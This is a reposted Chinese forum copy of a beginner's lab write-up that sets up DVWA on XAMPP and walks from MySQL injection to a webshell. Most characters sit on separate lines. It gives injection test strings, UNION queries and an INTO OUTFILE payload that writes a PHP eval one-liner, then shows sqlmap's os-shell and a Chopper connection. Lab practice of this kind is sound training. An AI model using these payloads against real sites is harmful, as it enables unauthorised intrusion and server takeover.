论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[13111] 2018-08-26_搭建dvwa环境学习从MySql注入到GetShell
文档创建者:
s7ckTeam
浏览次数:
3
最后更新:
2025-01-18
IOT
3 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2018-08-26_搭建dvwa环境学习从MySql注入到GetShell
搭
建
d
v
w
a
环
境
学
习
从
M
y
S
q
l
注
入
到
G
e
t
S
h
e
l
l
z
h
e
n
g
p
e
n
g
f
e
i
F
r
e
e
B
u
f
2
0
1
8
-
0
8
-
2
6
引
言
引
言
一
转
眼
从
刚
开
始
看
关
于
安
全
的
基
础
书
籍
到
现
在
已
经
十
个
月
的
时
间
了
,
对
渗
透
测
试
的
兴
趣
也
不
断
的
增
加
,
由
于
刚
开
始
工
作
的
需
求
,
只
来
得
及
看
一
些
常
见
漏
洞
的
基
本
原
理
就
开
始
跟
随
老
师
傅
开
始
渗
透
测
试
的
工
作
。
现
在
还
记
得
第
一
次
自
己
发
现
x
s
s
激
动
的
心
情
,
师
傅
领
进
门
,
学
习
到
了
很
多
知
识
,
后
来
因
为
工
作
原
因
到
了
安
服
务
项
目
上
去
,
三
月
粗
糙
的
渗
透
测
试
能
力
不
足
以
支
撑
在
项
目
上
有
很
好
的
实
践
,
而
且
由
于
项
目
经
过
其
他
渗
透
测
试
人
员
千
百
遍
的
洗
礼
比
较
严
重
的
漏
洞
也
不
在
外
面
做
项
目
那
么
常
见
。
有
一
天
之
前
带
我
的
师
傅
说
给
你
网
站
,
帮
忙
做
下
渗
透
,
于
是
我
经
过
一
番
测
试
,
发
现
了
暴
力
破
解
,
还
有
一
些
验
证
绕
过
的
逻
辑
漏
洞
,
匆
匆
写
了
报
告
交
差
,
师
傅
一
顿
夸
之
后
说
他
自
己
通
过
注
入
g
e
t
s
h
e
l
l
了
一
个
同
C
段
的
网
站
,
我
说
我
C
段
扫
描
时
候
并
没
有
发
现
这
个
I
P
啊
(
挫
败
感
之
下
的
借
口
)
,
然
后
我
说
我
如
果
能
发
现
这
个
系
统
应
该
也
能
g
e
t
s
h
e
l
l
,
师
傅
的
一
句
话
有
点
触
及
到
我
的
那
啥
(
你
估
计
应
该
不
会
通
过
m
y
s
q
l
注
入
g
e
t
s
h
e
l
l
)
。
是
啊
,
在
项
目
上
的
系
统
每
周
每
个
月
经
过
几
十
遍
的
过
滤
,
平
时
看
到
提
交
参
数
的
地
方
也
就
是
啊
,
在
项
目
上
的
系
统
每
周
每
个
月
经
过
几
十
遍
的
过
滤
,
平
时
看
到
提
交
参
数
的
地
方
也
就
s
q
l
m
a
p
跑
一
跑
,
对
于
最
基
跑
一
跑
,
对
于
最
基
础
的
手
工
注
入
都
没
有
扎
实
的
学
会
,
于
是
我
决
定
要
知
道
如
何
搭
建
环
境
并
学
会
如
何
通
过
础
的
手
工
注
入
都
没
有
扎
实
的
学
会
,
于
是
我
决
定
要
知
道
如
何
搭
建
环
境
并
学
会
如
何
通
过
m
y
s
q
l
到
到
g
e
t
s
h
e
l
l
。
。
通
过
查
资
料
,
总
结
出
了
这
篇
文
章
,
把
自
己
心
路
历
程
写
出
来
分
享
给
初
学
者
也
希
望
能
得
到
大
牛
的
指
正
,
希
望
入
门
级
玩
家
能
共
勉
,
自
己
多
创
建
学
习
的
环
境
,
多
思
考
。
搭
建
环
境
搭
建
环
境
在
刚
开
始
学
习
的
时
候
,
就
是
通
过
搭
建
D
V
W
A
学
习
各
种
漏
洞
,
s
q
l
注
入
,
x
s
s
,
文
件
上
传
等
等
,
所
以
在
想
到
如
何
搭
建
一
个
存
在
注
入
的
环
境
时
候
,
脑
海
中
立
刻
有
了
这
个
想
法
,
我
们
看
到
的
教
程
往
往
只
会
介
绍
如
何
通
过
高
中
低
的
安
全
级
别
进
行
漏
洞
的
复
现
,
那
为
什
么
不
可
以
通
过
注
入
进
行
g
e
t
s
h
e
l
l
呢
,
所
以
我
立
刻
搭
建
了
环
境
准
备
尝
试
一
下
。
S
T
E
P
1
准
备
好
需
要
的
文
件
,
在
网
上
都
可
以
免
费
下
载
的
到
1
)
X
a
m
p
p
集
成
环
境
2
)
D
v
w
a
压
缩
包
S
T
E
P
2
点
击
安
装
并
启
动
x
a
m
p
p
,
其
中
可
能
在
开
启
a
p
a
c
h
e
时
会
出
现
错
误
,
此
时
需
要
通
过
修
改
c
o
n
f
i
g
文
件
把
端
口
改
成
未
占
用
的
端
口
即
可
,
我
这
里
就
改
为
4
4
3
3
与
8
0
8
1
。
把
d
v
w
a
解
压
并
放
到
x
a
m
p
p
目
录
下
的
h
t
d
o
c
目
录
下
S
T
E
P
3
此
时
环
境
已
经
搭
建
完
毕
,
访
问
登
陆
,
就
可
以
看
到
各
种
各
样
的
漏
洞
环
境
。
参
考
参
考
*
*
:
*
*
站
内
及
网
上
有
关
于
搭
建
环
境
的
详
细
介
绍
,
如
按
照
上
述
步
骤
不
能
搭
建
成
功
,
可
自
行
搜
索
解
决
问
题
。
链
接
:
链
接
:
h
t
t
p
:
/
/
w
w
w
.
f
r
e
e
b
u
f
.
c
o
m
/
s
e
c
t
o
o
l
/
1
0
2
6
6
1
.
h
t
m
l
漏
洞
利
用
漏
洞
利
用
—
—
手
工
手
工
*
*
篇
篇
*
*
手
工
注
入
到
g
e
t
s
h
e
l
l
思
路
:
1
)
判
断
是
否
有
注
入
,
注
入
是
字
符
型
还
是
数
字
型
;
2
)
然
后
利
用
s
q
l
语
句
来
进
行
操
作
磁
盘
文
件
(
m
y
s
q
l
数
据
库
读
取
磁
盘
文
件
是
非
常
简
单
的
,
因
为
m
y
s
q
l
提
供
了
l
o
a
d
_
f
i
l
e
(
)
等
函
数
,
如
果
把
数
据
库
与
网
站
装
在
同
服
务
器
上
,
就
很
容
易
被
写
入
w
e
b
s
h
e
l
l
)
。
漏
洞
利
用
漏
洞
利
用
S
T
E
P
1
输
入
输
入
1
,
查
询
成
功
,
查
询
成
功
输
入
1
’
a
n
d
‘
1
‘
=
’
2
,
查
询
失
败
,
返
回
为
空
输
入
1
’
o
r
‘
1
2
3
4
‘
=
’
1
2
3
4
,
查
询
成
功
,
说
明
存
在
注
入
我
们
通
过
查
看
源
代
码
功
能
,
看
一
下
在
l
o
w
级
别
中
是
如
何
进
行
数
据
库
查
询
的
我
们
把
我
们
刚
才
注
入
成
功
的
语
句
拼
接
到
s
q
l
查
询
语
句
中
进
行
分
析
原
理
其
实
很
简
单
,
就
是
通
过
一
个
条
件
语
句
判
断
,
如
果
w
h
e
r
e
后
面
的
条
件
语
句
为
真
,
就
可
以
进
行
查
询
,
如
果
条
件
判
断
为
假
,
就
为
错
,
不
返
回
任
何
结
果
。
在
高
中
我
们
学
习
条
件
语
句
的
时
候
就
知
道
在
进
行
o
r
运
算
的
时
的
规
则
:
S
T
E
P
2
S
Q
L
语
句
只
语
句
只
u
n
i
o
n
查
询
查
询
大
多
数
的
S
Q
L
查
询
只
包
含
从
一
个
或
多
个
表
中
返
回
数
据
的
单
条
S
E
L
E
C
T
语
句
(
比
如
说
我
们
在
i
d
处
输
入
1
,
就
会
返
回
一
个
结
果
)
,
但
是
S
Q
L
也
允
许
执
行
多
个
查
询
(
多
条
S
E
L
E
C
T
语
句
)
,
并
将
结
果
作
为
一
个
查
询
结
果
集
返
回
。
这
些
组
合
查
询
通
常
称
为
并
或
复
合
查
询
,
一
般
常
见
的
数
据
库
有
都
支
持
U
N
I
O
N
查
询
,
使
用
U
N
I
O
N
很
简
单
,
所
要
做
的
只
是
给
出
每
条
S
E
L
E
C
T
语
句
,
然
后
再
每
条
S
E
L
E
C
T
语
句
之
间
加
上
U
N
I
O
N
关
键
字
,
这
样
所
给
出
的
S
E
L
E
C
T
结
果
集
就
能
组
合
成
一
个
结
果
集
并
返
回
。
举
例
说
明
举
例
说
明
1
)
我
们
在
i
d
处
输
入
1
,
返
回
一
个
结
果
2
)
在
i
d
处
输
入
1
’
u
n
i
o
n
s
e
l
e
c
t
1
,
2
’
,
可
以
看
出
,
我
们
在
数
据
库
中
执
行
了
两
次
s
e
l
e
c
t
查
询
并
同
时
返
回
了
两
个
结
果
S
T
E
P
3
利
用
利
用
u
n
i
o
n
查
询
执
行
查
询
执
行
m
y
s
q
l
所
带
有
的
函
数
,
对
磁
盘
文
件
进
行
操
作
所
带
有
的
函
数
,
对
磁
盘
文
件
进
行
操
作
1
)
我
们
输
入
1
’
u
n
i
o
n
s
e
l
e
c
t
1
,
’
<
?
p
h
p
@
e
v
a
l
(
$
_
P
O
S
T
[
‘
p
a
s
s
’
]
)
?
>
’
i
n
t
o
o
u
t
f
i
l
e
‘
C
:
/
x
a
m
p
p
/
h
t
d
o
c
s
/
d
v
w
a
/
1
.
p
h
p
’
#
使
用
i
n
t
o
o
u
t
f
i
l
e
写
入
一
句
话
木
马
,
文
件
名
为
1
.
p
h
p
,
发
现
报
错
了
,
查
找
原
因
。
2
)
通
过
报
错
信
息
可
以
看
到
应
该
说
是
单
引
号
闭
合
的
问
题
,
因
为
前
段
时
间
在
学
p
y
t
h
o
n
,
所
以
决
定
把
一
句
话
木
马
里
的
单
引
号
改
成
双
引
号
试
一
试
1
’
u
n
i
o
n
s
e
l
e
c
t
1
,
’
<
?
p
h
p
@
e
v
a
l
(
$
_
P
O
S
T
[
“
p
a
s
s
”
]
)
?
>
’
i
n
t
o
o
u
t
f
i
l
e
‘
C
:
/
x
a
m
p
p
/
h
t
d
o
c
s
/
d
v
w
a
/
1
.
p
h
p
’
#
(
刚
才
开
始
不
知
道
s
q
l
语
句
中
单
引
号
里
要
用
双
引
号
,
简
直
折
磨
啊
,
各
种
用
单
引
号
进
行
闭
合
,
各
种
报
错
,
各
种
头
铁
尝
试
,
我
甚
至
以
为
是
不
是
我
没
有
权
限
进
行
写
入
文
件
,
错
误
的
怀
疑
人
生
。
)
3
)
没
有
报
错
信
息
了
,
成
功
了
?
查
看
目
录
,
果
然
有
了
1
.
p
h
p
文
件
,
赶
紧
上
菜
刀
(
舒
服
啊
,
虽
然
没
有
真
实
环
境
那
么
开
心
,
但
是
毕
竟
也
算
是
利
用
成
功
了
)
手
工
测
试
到
这
里
就
结
束
了
,
像
我
这
种
工
具
狗
,
肯
定
想
办
法
用
工
具
来
解
决
。
漏
洞
利
用
漏
洞
利
用
—
—
工
具
篇
工
具
篇
最
常
见
的
利
用
发
现
s
q
l
注
入
的
方
式
就
是
s
q
l
m
a
p
了
,
做
渗
透
测
试
的
人
手
一
本
,
知
道
存
在
s
q
l
注
入
,
上
来
就
拿
过
来
跑
一
跑
S
T
E
P
1
:
发
现
注
入
,
并
且
实
现
发
现
注
入
,
并
且
实
现
U
R
L
:
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
8
0
8
1
/
d
v
w
a
/
v
u
l
n
e
r
a
b
i
l
i
t
i
e
s
/
s
q
l
i
/
?
i
d
=
1
&
S
u
b
m
i
t
=
S
u
b
m
i
t
#
,
哇
X
,
结
果
竟
然
失
败
了
,
通
过
下
图
的
s
q
l
m
a
p
中
报
的
3
0
2
信
息
中
可
以
看
到
在
进
行
测
试
时
是
跳
转
到
了
登
陆
界
面
,
原
来
用
s
q
l
m
a
p
测
试
是
需
要
登
陆
的
。
一
番
操
作
,
知
道
要
添
加
c
o
o
k
i
e
进
行
测
试
,
成
功
啦
。
S
T
E
P
2
:
利
用
s
q
l
m
a
p
中
o
s
-
s
h
e
l
l
参
数
继
续
进
行
攻
击
(
–
o
s
-
s
h
e
l
l
也
就
是
从
注
入
点
获
得
一
个
交
互
式
的
s
h
e
l
l
,
给
我
们
提
供
了
一
个
环
境
可
以
执
行
一
定
的
系
统
命
令
,
讲
白
了
也
就
是
类
似
于
在
w
i
n
d
o
w
s
下
的
c
m
d
)
。
S
T
E
P
3
:
根
据
具
体
系
统
的
环
境
来
选
择
语
言
,
D
v
w
a
用
的
是
p
h
p
,
自
然
就
选
择
p
h
p
,
然
后
选
择
2
自
定
义
上
传
位
置
。
此
处
想
要
获
得
s
h
e
l
l
,
就
必
须
知
道
网
站
的
绝
对
路
径
。
(
C
:
x
a
m
p
p
h
t
d
o
c
s
d
v
w
a
中
的
路
径
分
隔
符
在
w
i
n
d
o
w
s
下
需
要
在
加
上
进
行
转
译
)
。
S
T
E
P
4
:
可
以
看
到
获
得
了
o
s
-
s
h
e
l
l
,
并
且
在
网
站
目
录
下
上
传
了
两
个
p
h
p
格
式
的
文
件
,
我
们
对
这
两
个
文
件
进
行
访
问
,
可
看
到
给
我
们
提
供
了
上
传
点
,
通
过
上
传
点
进
行
木
马
文
件
的
上
传
。
S
T
E
P
5
:
利
用
此
上
传
点
上
传
2
.
p
h
p
,
内
容
为
p
h
p
一
句
话
木
马
(
熟
悉
p
h
p
的
可
以
自
己
写
,
不
熟
悉
的
可
以
百
度
)
,
然
后
通
过
菜
刀
进
行
连
接
,
获
得
s
h
e
l
l
。
总
结
总
结
自
己
的
学
习
探
索
过
程
远
远
不
止
这
些
,
因
为
在
搭
建
环
境
包
括
在
利
用
漏
洞
的
时
候
都
会
出
现
各
种
各
样
的
问
题
,
都
需
要
通
过
不
断
的
探
索
去
解
决
,
比
如
说
在
手
工
进
行
注
入
的
时
候
甚
至
因
为
单
引
号
是
中
文
的
还
是
英
文
的
吃
过
亏
,
还
有
如
何
进
行
单
引
号
闭
合
,
进
行
s
q
l
m
a
p
进
行
攻
击
的
时
候
需
要
添
加
c
o
o
k
i
e
,
在
获
得
o
s
-
s
h
e
l
l
时
候
需
要
加
反
斜
杠
进
行
转
译
等
等
…
,
一
次
一
次
的
错
误
,
一
次
一
次
的
解
决
,
不
放
弃
静
下
心
来
解
决
问
题
,
学
习
的
过
程
就
是
如
此
,
包
括
平
时
的
渗
透
也
是
如
此
,
需
要
耐
下
心
来
慢
慢
的
摸
索
,
在
摸
索
的
过
程
中
不
断
提
升
自
己
的
技
术
,
不
断
的
成
长
,
毕
竟
大
牛
也
不
是
一
天
练
成
的
。
缺
点
缺
点
1
)
环
境
为
搭
建
的
环
境
,
权
限
较
高
,
也
没
有
防
火
墙
、
w
a
f
等
安
全
设
备
的
防
护
,
不
会
出
现
被
拦
截
等
情
况
,
真
实
的
环
境
往
往
需
要
躲
过
一
重
又
一
重
的
防
护
。
2
)
文
章
中
未
涉
及
l
i
n
u
x
下
的
攻
击
利
用
方
式
,
因
为
o
s
-
s
h
e
l
l
一
直
是
一
个
吐
槽
的
点
,
这
需
要
注
入
点
有
多
大
的
权
限
啊
,
有
这
个
权
限
,
我
还
需
要
这
个
操
作
么
之
类
的
?
其
中
在
l
i
n
u
x
就
因
为
权
限
的
问
题
没
有
解
决
,
所
以
没
有
利
用
成
功
,
同
时
看
了
大
牛
的
文
章
什
么
监
听
反
弹
s
h
e
l
l
之
类
的
也
是
有
点
懵
的
。
所
以
希
望
新
手
看
到
这
篇
文
章
后
,
可
以
自
己
去
装
虚
拟
机
去
尝
试
。
并
不
是
说
能
学
到
多
少
内
容
,
更
重
要
的
还
是
总
结
出
自
己
平
时
学
习
的
思
路
,
自
己
给
自
己
创
造
环
境
,
多
用
虚
拟
机
,
见
识
多
了
自
然
懂
的
就
多
了
,
也
希
望
大
牛
看
到
了
能
多
提
意
见
,
给
新
手
成
长
的
空
间
与
机
会
。
*
本
文
作
者
:
z
h
e
n
g
p
e
n
g
f
e
i
,
转
载
请
注
明
来
自
F
r
e
e
B
u
f
.
C
O
M
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT